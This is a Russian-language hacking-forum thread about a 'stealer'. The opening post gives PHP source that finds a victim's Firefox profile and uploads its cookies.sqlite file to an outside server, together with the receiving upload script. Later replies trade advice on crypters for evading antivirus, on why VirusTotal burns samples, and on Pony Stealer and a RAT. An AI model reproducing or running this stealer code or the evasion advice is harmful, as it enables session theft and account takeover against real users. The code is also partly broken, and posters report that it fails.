Немного слов про Стилер


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 122
Репутация
8 238
Кто-нить пробовал ?Не въехал!!!
Что-то у меня так ничего и не стырил, видно в 32 уже профиксили...

Кому лень качать там два файла:

Код:
<?PHP
function ip_log(){
    $data = "12783162312378912783918923";
    preg_match_all("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/",$data,$ip);
    return $ip;
}
function upload($file){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_VERBOSE, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_VERBOSE,true);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/31.0 (compatible;)");
    curl_setopt($ch, CURLOPT_URL, "http://yoursite.com/upload.php");
    curl_setopt($ch, CURLOPT_POST, true);
    // same as <input type="file" name="file_box">
    $post = array(
  "uploadedfile"=> "@$file",
        );
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    $response = curl_exec($ch);
}

$windir =  trim(shell_exec('echo %windir%')) . "\\";
$windir = substr($windir,0, 2);
$ip = ip_log();
$data = shell_exec("dir " . (escapeshellarg($windir . "\Documents and Settings" . "\\" . get_current_user() . "\\" . "Application Data\Mozilla\Firefox\Profiles")));

    if($data != "")
    {
        preg_match_all("/<DIR> +(.*\.default)/",$data,$pname);  // search for the profile name
        $data = shell_exec("dir " . (escapeshellarg($windir . "\Documents and Settings" . "\\" . get_current_user() . "\\" . "Application Data\Mozilla\Firefox\Profiles\\" . $pname[1][0])));
        preg_match_all("/Directory of (.*)/",$data,$loc);  //get the exact cookie's path
        upload($loc[1][0] . "\cookies.sqlite",$ip . "_cookies.sqlite");
    }
    else
    {
        $data = shell_exec("dir " . (escapeshellarg($windir . "\Users" . "\\" . get_current_user() . "\\" . "Application Data\Mozilla\Firefox\Profiles")));
        preg_match_all("/<DIR> +(.*\.default)/",$data,$pname);  // search for the profile name
        $data = shell_exec("dir " . (escapeshellarg($windir . "\Users" . "\\" . get_current_user() . "\\" . "Application Data\Mozilla\Firefox\Profiles\\" . $pname[1][0])));
        preg_match_all("/Directory of (.*)/",$data,$loc);  //get the exact cookie's path
        upload($loc[1][0] . "\cookies.sqlite",$ip . "_cookies.sqlite");
    }

?>

Код:
<?PHP

$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file ".  basename( $_FILES['uploadedfile']['name']).
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
?>

У меня выводит:There was an error uploading the file, please try again! похоже не работает уже !NO-no!!!
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Как можно посмотреть чужие логи со стилера.И как защитить себя от такого вмешательства.
 

seledkapod

Пользователь
Форумчанин
Регистрация
17.12.2014
Сообщения
5
Репутация
8
Всё вроде работает.Единственная пичалька,что палится даже Защитником Виндовс.
Эммм, про крипторы не? Не слышали? И еще не советую на вирустотал вообще что либо заливать, особенно файлы криптованные паблик крипторами. Вирустотал сливает всю инфу напрямую в антивирусные компании и потому-то паблик крипторы так долго и не живут. Пользуйтесь например, он не сливает пока вроде.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 122
Репутация
8 238
Эммм, про крипторы не? Не слышали? И еще не советую на вирустотал вообще что либо заливать, особенно файлы криптованные паблик крипторами. Вирустотал сливает всю инфу напрямую в антивирусные компании и потому-то паблик крипторы так долго и не живут. Пользуйтесь например, он не сливает пока вроде.
Спасибо за советы, мы всегда рады активности в хак. разделе...

Но не надо думать что мы-уж совсем такие деревянные, разумеется мы знаем что VT сливает инфу, также знаем про крипторы, также что и крипторые есть разные, есть например которые скрывают от сканеров, но при этом палятся при запуске...Отдыхай!!!

Что касается слития на VT, тут вроде никто и не сливает, либо ОЧЕНЬ редко, только для теста, дело в том что бесплатные сканеры типо например того-же не всегда даёт правдивые результаты, где-то я даже здесь на форуме приводил пример, неправильных результатов, т.е. вирус не детектился по версии viruscheckmate.com а на самом деле детект был на VT.

И ещё скажу что VT либо очень долго сливает некоторые вирусы, либо какие-то стабы/вирусы несливает вообще, видно это зависит от-того как вирус распространяется...
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Эммм, про крипторы не? Не слышали? И еще не советую на вирустотал вообще что либо заливать, особенно файлы криптованные паблик крипторами.
Как приятно лицезреть на нашем форуме столь благовоспитанных,грамотных и учтивых пользователей!Вы внесли неоценимый вклад в ликвидацию безграмотности на нашем деревенском ресурсе.Мы обязательно прислушаемся к вашим мудрым советам.
P.S.А вот писать недопосты в теме,чтобы увидеть текст из-под хайда очень нехорошо.Обычно за это получают бан.Но вам,как опытному наставнику школоло-троянщиков,вынесли только предупреждение.Не делайте больше так.
 

seledkapod

Пользователь
Форумчанин
Регистрация
17.12.2014
Сообщения
5
Репутация
8
Ммм, наставник школоло-троянщиков, крутоsm181818 не ваш ли это отчет на VT? Да и надо же внести хоть какое-то разнообразие на вашем форумеWinkSmile А тот пост да, нужен был пак кодеров, признаю грешок)) Ну я кстати за него так сказать поделился rat-ом.
 
Последнее редактирование:

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
не ваш ли это отчет на VT
А,хрен знает,может и мой.Вы думаете пристыдить меня этим отчётом?Зря.Я бессовестный)Все эти побрякушки-крипторыстилероботнеты мне совершенно безразличны как инструмент хакира.Меня интересует лишь функциональность и работоспособность этих тулз.А своим отчётом ВТ можете пугать молодёжь на каком-нибудь хэппи-хаке.
 

seledkapod

Пользователь
Форумчанин
Регистрация
17.12.2014
Сообщения
5
Репутация
8
А,хрен знает,может и мой.Вы думаете пристыдить меня этим отчётом?Зря.Я бессовестный)Все эти побрякушки-крипторыстилероботнеты мне совершенно безразличны как инструмент хакира.Меня интересует лишь функциональность и работоспособность этих тулз.А своим отчётом ВТ можете шугать молодёжь на каком-нибудь хэппи-хаке.
https://ru-sfera.pw/threads/pony-stealer-1-9.1810/ С этой темы отчет, и пугать я никого и не собирался, просто как бы благодаря таким вот отчетам потом паблик крипт непалящийся хрен найдешь. Не имею ввиду что именно вы конкретно в этом виноваты.
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
как бы благодаря таким вот отчетам потом паблик крипт непалящийся хрен найдешь.
Уважаемый!Этот стилер древний как го.но мамонта.До меня его заливали-перезаливали тысячу раз.Актуальные кодерские поделки я на ВТ не лью.Даже дерьмовые пабликовские испанские крипторы и то проверяю на нормальных сервисах.
А то,что вы пользуетесь подобными крипторами-ваша проблема.Засим откланяюсь,дабы ненароком не оскорбить вас или что хуже-забанить за такие выпады.Всего вам хорошего!
 
Верх Низ